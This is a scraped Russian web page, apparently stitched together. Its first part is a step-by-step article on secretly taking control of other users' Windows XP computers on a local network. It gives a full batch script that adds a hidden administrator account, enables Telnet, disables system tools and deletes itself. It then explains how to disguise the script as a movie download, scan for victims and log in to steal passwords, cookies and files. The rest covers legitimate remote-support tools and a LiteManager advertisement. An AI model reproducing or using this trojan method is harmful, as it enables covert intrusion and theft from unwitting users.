Удаленное управление компьютером без ведома пользователя

Удаленное управление компьютером без ведома пользователя

Привет всем, это моя первая статья на хабре, так что не судите строго. В этом посте я опишу как можно получить удаленный доступ к компьютеру пользователя в вашей локальной сети через командную строку, обходя все антивирусы и немного зная синтаксис командной строки Windows. Статья предназначена для использования только на Windows XP, но при желании можно переписать код под любую другую ОС семейства Windows. Итак, приступим. В целом, статья написана для пользователей начального уровня. Самая главная цель — это заполучить нужные данные (пароли, явки, дачи, доступ к почтовым ящикам, файлы ключей webmoney, куки и прочая важная перхоть) и уйти незаметно, не оставив следов проникновения. Итак, начнем, я нахожусь в локальной сети имеющей порядка 5000 пользователей, сеть со статикой или dhcp не имеет значения, мне розан ip адрес и я счастлив. В сети имеется тьма подсетей, роуты которых прописаны на серваке. MAC адрес компа прописан у админа сети, так как в моем случае, это было условие подключения к сетке, таким образом мой мак засветится в случае чего. Во избежание быть найденным, первым делом устанавливаем виртуальную машину (использовал VmWare 5.1), устанавливаем на нее XP, сканер портов (использовал SuperScan 3.00 Скачать можно здесь) и запускаем службу Telnet. Подключаем виртуальную машину к сети с помощью NAT и получаем таким образом совершенно другой mac-адрес машины смотрящей в сеть. Все гуд виртуалку поставили, идем дальше. Открываем обычный блокнот и пишем батник следующего содержания:

@Echo off
Net user Admin_Support lop /add >nul
Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul
Net accounts /maxpwage:unlimited >nul sc config TlntSvr start= auto >nul
Sc start TlntSvr >nul
Reg add «HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList » /v Admin_support /t REG_DWORD /d 0 >null
Reg add »HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem» /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Reg add «HKCUSOFTWAREPOLICIESMicrosoftMMC» /v RestrictPemitSnapins /t Reg_dword /d 1 /f >nul del %SestemRoot%system32compmgmt.msc >nul
del Start_game.bat

1. Echo off (думаю всем понятно, объяснять не стоит).

2. Net user Admin_Support lop /add >nul Создаем в системе учетную запись с произвольным логином, в примере: Admin_Support и паролем lop. Учетка появится в списке учетных записей пользователей, можно придумать другое имя, к примеру что-то похожее на SUPPORT_388945a0 (учетная запись поставщика для службы справки и поддержки), на которую большинство пользователей не обращают внимания. Есть 1 нюанс мы создали учетку, но ведь она появится при входе в систему у пользователя, необходимо ее скрыть, об этом будет описано ниже.

3. Net localgroup net localgroup Ђ¤¬Ё­Ёбва в®ал Admin_support /add >nul Добавляем учетку Аdmin_support в группу Администраторы, кодировка слова «Администраторы», как у меня в данном случае «Ђ¤¬Ё­Ёбва в®ал» обязательно должна быть в кодировке DOS. Можно сделать в обычном Far’e. Т.е. то слово у меня уже в кодировке dos.

4. Net accounts /maxpwage:unlimited >nul Период времени в днях, в течение которого будет действовать пароль пользователя. Значение unlimited снимает ограничение по времени. Значение параметра /maxpwage должно быть больше, чем значение параметра /minpwage. Допустимы значения от 1 до 49 710 дней (т. е. значение unlimited равно 49 710 дней), по умолчанию используется значение 90 дней.

5. Sc config TlntSvr start= auto >nul Устанавливаем службу телнет в режим запуска «авто».

6. Sc start TlntSvr >nul Стартуем службу телнет.

7.Reg add “HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinlogonSpecialAccountsUserList ” /v admin_support /t REG_DWORD /d 0 >null Добавляем ключ в реестр, который скроет нашу учетку в записях в панели управления и при входе в винду (Аутентификации).

Читайте также:  Что будет если фазу соединить с нулем

8. Reg add “HKCUSOFTWAREMicrosoftWindowsCurrentVersionpoliciesSystem” /v DisableRegistryTools /t Reg_dword /d 1 /f >nul Запрещаем запуск редактирования реестра. (Можно обойтись и без этого параметра).

9. Reg add “HKCUSOFTWAREPOLICIESMicrosoftMMC” /v RestrictPemitSnapins /t REG_DWORD /d 1 /f >nul
del %SestemRoot%system32compmgmt.msc >nul
Удаляем mmc (Не обязательный параметр).

10. Reg add “HKCUSOFTWAREPOLICIESMicrosoftwindowsSystem” /v DisableCMD /t REG_DWORD /d 2 /f >nul Запрещаю запуск командной строки. (Не обязательный параметр.)

11. Del Start_game.bat Удаляем сам батник.

Батник готов. Сохраняем содержимое блокнота как .bat файл, под любым именем, в моем случае это Start_game.bat

Далее делаем из bat файла exe файл с помощью обычного winrar’a. В параметрах winrar’a устанавливаем параметр «создать архив sfx» и «выполнить после распаковки файл» батник «Start_game.bat». Также в настройках создания архива указываем: распаковывать в скрытом режиме. Помимо этого добавляем к батнику, с помощью того же winrar’a иконку к файлу. Жмем создать архив и получаем exe-шник с иконкой. Работа с Winrar также показана в видеоуроке ниже.

З.Ы. Конечно же можно использовать и другие программы для создания exe файла, которые имеют различный нужный функционал, такой как задание размера файла, типа, скрытия окна распаковки и прочих интересных вещей. В данном примере для большей наглядности я использовал WinRAR.

(Делать можно необязательно exe файл можно создать и другие типы файлов).

Итак мы получили файл с именем Start_game.exe, также можно создать более оригинальный файл с актуальным именем, чтобы пользователи увидев его в сети захотели его скачать, например название фильма, который недавно вышел или скоро должен выйти и его все ждут, (например Трансформеры-3HDTVRip.avi) ну и так далее.

Далее расшариваем папку в сети с нашим Start_game.exe. Как только наш юзверь скачает и запустит наш Start_game.exe, сработает наш батник, и удалится. Открываем нашу виртуальную машину и запускаем сканер портов, где указываем диапозон сканирования нашей сети (в моем случае это 10.16.93.1-10.16.93.255) и порт телнета (22 или 23). Сканер покажет у какого ip адреса открыт порт телнета. Если порт открыт, смело подключаемся, открываем командную строку и подключаемся командой: telnet ip_адрес, где вводим наш логин admin_support и пароль lop. тем самым получаем доступ к командной строке юзверя, и делаем СВОЁ ДЕЛО! ))) Умея пользоваться командной строкой, можно найти и скопировать любые файлы на компьютере пользователя, скрыто установить практически любое нужное программное обеспечение, и много еще чего интересного. Для более наглядного понимания статьи выкладываю реальный видеоурок со своей сети. Урок довольно старый, так как занимался я этим довольно давно.

При желании батник можно доработать для более интересных нужд, в данной статье показан лишь простой способ доступа к ПК пользователя без его ведома.

З.Ы. Единственный минус батника — cmd.exe висит в процессах у пользователя в диспетчере задач. Но я думаю это не так страшно, так как обычные пользователи не особо заморачиваются в знании имени процесса в диспетчере задач.

Данная статья не подлежит комментированию, поскольку её автор ещё не является полноправным участником сообщества. Вы сможете связаться с автором только после того, как он получит приглашение от кого-либо из участников сообщества. До этого момента его username будет скрыт псевдонимом.

Есть два варианта удаленного подключения к компьютеру :
1. для технической поддержки пользователя, интерактивно
2. для административных задач.

Читайте также:  1С как проверить заполнение табличной части

Клиентские ОС не подразумевают одновременную интерактивную работу с ОС двух пользователей без хаков : вы или будете подключаться к сеансу уже залогиненного пользователя, или же выкидывать его, чтобы "поработать" под своей учетной записью.

Для нужд технической поддержки (подключение к сеансу пользователя) есть куча разных утилит, платных и бесплатных, я же порекомендую обратить внимание на нативное решениt : remote assistance, который присутствует в клиентских ОС, начиная с windows 2000.
Плюсы : доменные компьютеры могут быть настроены на разрешение подключения к пользователям группы технической поддержки через gpo. Поддержка осуществляется как с удаленным управлением, так и без. Присутствует в системе, не требует софта.
Особенность (многие считают её минусом) : не подразумевает, ради безопасности, тайное подключение к сеансу пользователя без запроса.

Для административных нужд есть возможность управлять компьютером через powershell remoting (или pstools для ОС с отсутствующей PowerShell).

В домене Active Directory 99% задач по конфигурации пользовательских систем можно решить через gpo или, в срочных случаях, указанными выше средствами удаленного администрирования.

LiteManager Pro/Free — программа удаленного управления компьютерами через Интернет или администрирования в локальной сети, для технической поддержки пользователей, дистанционного обучения, контроля рабочего процесса сотрудников.

Программа позволяет: легко и быстро управлять рабочим столом компьютера в режиме реального времени, полностью поддерживая Windows, предоставляет надежный удаленный доступ к файловой системе, процессам и сервисам компьютера. LiteManager обладает встроенными функциями создания сетевой карты, сбора технической информации, возможностью развертывания и обновления с помощью средств удаленной установки, настройка своего личного ID роутера (NOIP) и многое другое.

Удаленное администрирование теперь возможно и без IP адреса, с помощью соединения по ID вы сможете сами выбирать свой личный уникальный ID и подключаться по нему. Клиентский и серверный модули программы способны работать в сетях подключенных к Интернету через прокси-сервер. Litemanager удаленное администрирование — Описание программы

Скачать (для Windows, версия 4937)

LiteManager.apk / Play маркет (Android)

LiteManager (app, pkg) / App store (Mac OS)

App store (iOS, iPhone, iPad)

LiteManager linux (Linux)

Wine (эмулятор для Linux, Mac OS)

Лицензия LiteManager бессрочная и количество специалистов не ограничено. При покупке напрямую Вы получаете дополнительную скидку 20%. Подробнее купить Litemanager…

Бесплатная версия, обладает всеми основными функциями и позволяет осуществлять управление до 30-ти компьютеров одновременно абсолютно бесплатно! Или более, при наличии лицензионного ключа. Удаленный рабочий стол без ограничений по времени и скорости сеанса.

Данная версия бесплатна как для физических, так и для юридических лиц.

Программу можно использовать для оказания технической поддержки клиентам, а возможность настроить свой собственный сервер подключений по ID обеспечивает полную автономность и независимость работы, как следствие и всей службы технической поддержки.

Основные возможности бесплатной Free версии и ее отличия от полной Pro версии приведены в таблице — Litemanager Free удаленное управление компьютером

Режим QuickSupport разработанный для быстрой поддержки пользователей, не требует установки и прав администратора — просто загрузите и запустите программу.

ROMServer.exe (Сервер без установки) (для удалённого пользователя)

ROMViewer.exe (Клиент без установки) (для администратора)

ROMServer.exe (без прав администратора) (для удалённого пользователя)

LiteManager Portable включает в себя все функции полной версии, не требуя какой-либо установки и работает прямо с USB-накопителя. Подробнее о Portable версии LiteManager.

Преимущества нашего продукта:

  • Управление и просмотр удаленного рабочего стола компьютера Remote Desktop
  • Можно использовать функции Drag&Drop, системный буфер обмена функции Copy&Paste, переключаться между мониторами или между пользователями работающих в различных терминальных сессиях. Поддерживается графическая оболочка Windows 7 Aero, и при подключение не отключается. Доступен экономичный режим, при включение которого уменьшается потребление трафика.
Читайте также:  Черный экран при установке драйвера видеокарты nvidia
  • Файловый менеджер для работы с файлами и папками
    • Позволяет просматривать файловую систему, копировать, удалять, запускать или открывать файлы для редактирования, для быстрой навигации используйте систему закладок. Файловый менеджер может передавать данным между двумя подключенными компьютерами.
    • Диспетчер задач
      • Диспетчер позволяет управлять процессами и сервисами, просматривать информацию о запущенных программах, запускать или останавливать их. Диспетчер задач так же отображает информацию о подключенных пользователях.
      • Управление питанием компьютера
        • С помощью данного режима вы можете выключить, перезагрузить или включить компьютер функцией Wake-On-LAN. Отключить или включить монитор и отправить его в спящий режим.
        • Текстовый и аудио-видео чат
          • Позволяет общаться с пользователем в текстовом чате, есть функция отправки одиночного сообщения пользователю в виде уведомления. Аудио-видео чат для общения с помощью микрофона и веб камеры, чат может работать в режиме диалога, вещания или захвата звука и видео.
          • Telnet управление компьютером через командную строку
            • Подключение в виде командной строки, можно работать от имени пользователя или от имени системы.
            • Диспетчер устройств или инвентаризация
              • Позволяет быстро и удобно собирать информацию об установленном оборудование и программном обеспечение.
              • Запись экрана по расписанию
                • Автономная запись рабочего стола в видео файл. Является удобным и эффективным средством контроля рабочего времени сотрудников
                • Карта сети
                  • Вы можете нарисовать топологическую карту вашей сети со всем оборудование для более удобного администрирования. Карта является полностью интерактивной с возможностью подключения и настройки соединений.
                  • Подключение сервера с динамическим IP адресом и функция каскадного соединения для работы в сложных сетях
                    • С помощью функции «обратного соединение» или «Соединения по > Удаленная установка и обновление
                      • Несколько режимов установки программы с помощью встроенных средств Windows, MSI и функцией самообновления программы. Возможность конфигурирования сервера перед установкой.
                      • Встроенный поиск компьютеров
                        • Позволяет найти компьютеры, как с установленной серверной частью, так и без нее, после чего можно добавить их в основной список.
                        • Редактор реестра
                          • Подключение к системному реестру с возможностью редактирования данных, а также импорта и экспорта ключей реестра.
                          • Соединение по ID и NoIPServer приложение
                            • Для подключения без IP адреса можно воспользоваться режимом соединения по ID, Вы сами задаете желаемый ID для более удобной работы с ним. Дополнительная программа NoIPServer позволяющая соединять LMViewer и LMServer без IP адреса поставляется вместе с программой, с помощью неё вы сможете настроить свой корпоративный сервер ID соединений. NoIP можно запустить и на Unix системах под Wine.
                            • Полный перечень возможностей LiteManager и скриншоты.

                              Режим тех. поддержки функция Quick Support .

                              Соединение по ID как установить подключение по ID.

                              Обзор решений для корпоративных и частных пользователей.

                              OnLine справка программы теперь доступна на сайте.

                              Ответы на вопросы официальный FAQ.

                              База знаний программы LiteManager.

                              Удаленный доступ и администрирование компьютеров.

                              Программа LiteManager позволяет удаленно управлять компьютерами через Интернет, администрировать локальную сеть, а также контролировать сотрудников на протяжении всего рабочего дня.

                              Для служб удаленной технической поддержки.

                              С помощью LiteManager Вы сможете оказывать удаленную техническую поддержку пользователям, общаться с ними, обмениваться файлами. В результате Вы сможете сэкономить свое время и средства.

                              Для образовательных учреждений.

                              Программа LiteManager подойдет для организации процесса обучения, позволяет контролировать и эффективно управлять компьютерным классом, проводить демонстрационные уроки и тестирования.

                              Ссылка на основную публикацию
                              Adblock detector